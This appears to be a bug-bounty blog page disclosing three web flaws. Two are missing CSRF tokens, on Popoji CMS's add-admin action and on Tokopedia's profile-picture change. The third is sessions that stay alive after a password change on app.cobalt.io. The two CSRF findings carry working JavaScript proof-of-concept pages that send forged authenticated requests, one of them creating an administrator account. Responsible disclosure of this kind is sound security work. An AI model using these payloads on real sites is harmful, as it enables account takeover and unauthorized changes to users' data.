Missing CSRF Token On Add Admin [Popoji CMS]

Description:

This is happen because when request add admin there’s no CSRF token
Step To Reproduce :

<script>function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST", "http://root/popoji/poadmin/
route.php?mod=user&act=addnew", true);
xhr.withCredentials="true";
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan
dy21%40gmail.com&no_telp=083833232954&level=1');
}
</script>
<button>Let's Rock</button>

1. Save code to .html
2. upload them to host
3. execute it.

Video :

https://www.youtube.com/watch?v=1FXXuSiB6jo

Fix & Mitigation :

give token when request sensitive action.

Note:
them give me permission to disclose it, and they say the patch will deployed for next version. So, if you use popoji CMS, be careful, dont trust any link from unknown people and stay update your CMS. and also them give me bounty for this! yeey !

Session Not Expired When Password Has Been Changed [app.cobalt.io]

Description

When user change password from another platform, the previous platform still connect to account and still can edit the profile.

POC :

1. Login on mozilla,
2. Login on Chrome,
3. change the password on chrome.
4. back to mozilla, you still able to access the account
5. you still can edit profile.

Video :

https://youtu.be/Cz2zh7w4n6M (unlisted )

Note : I ask permission to app.cobalt.io to write it on my blog, and them give me the permission, so I write here,

Hope you enjoy~

Missing CSRF Token On Change Picture Request [Tokopedia.com]

Hi,

Actually i found many CSRF issue on tokopedia, but i just write this on my blog if you want to see all of them just go to my old blog : http://v1nsh4n.blogspot.co.id/search/label/Tokopedia

Description

This bug because when change picture there’s no CSRF token to cover it.

Vuln Request

POST /ajax/people-4.pl HTTP/1.1
Host: www.tokopedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: https://www.tokopedia.com/people/9946238/edit
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 526
Cookie: <somecookie>
Connection: close

file_path=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F300%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&file_th=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F100-square%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&message_status=0&pic_obj=eyJzZXJ2ZXJfaWQiOiI1MCIsImZpbGVfcGF0aCI6InVzZXItMS8yMDE3LzQvNy85OTQ2MjM4IiwicGljIjoiOTk0NjIzOF83YWMwMzU3Zi0wNWY3LTRmMzItOTJhNy1iNjliOWIyMzk1NmMucG5nIn0%3D&success=1&action=event_upload_profile_picture

Poc Code:

<script>
      function getMe(){
        // retrieve page content
        var xhr = new XMLHttpRequest();

        // now execute the CSRF attack
        xhr.open("POST", "https://www.tokopedia.com/ajax/people-4.pl", true);
        xhr.withCredentials="true";
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhr.send('file_path=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F300%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&file_th=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F100-square%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&message_status=0&pic_obj=eyJzZXJ2ZXJfaWQiOiI1MCIsImZpbGVfcGF0aCI6InVzZXItMS8yMDE3LzQvNy85OTQ2MjM4IiwicGljIjoiOTk0NjIzOF83YWMwMzU3Zi0wNWY3LTRmMzItOTJhNy1iNjliOWIyMzk1NmMucG5nIn0%3D&success=1&action=event_upload_profile_picture');
        }
</script>
<button onclick="getMe();">Let's Rock</button>

Note: file_path is another user photo

Step to reproduce:

  • Save Code .html
  • Click `Lets Rock`
  • Photo will be update with photo from file_path

Video : https://youtu.be/jNE2ECG9DRQ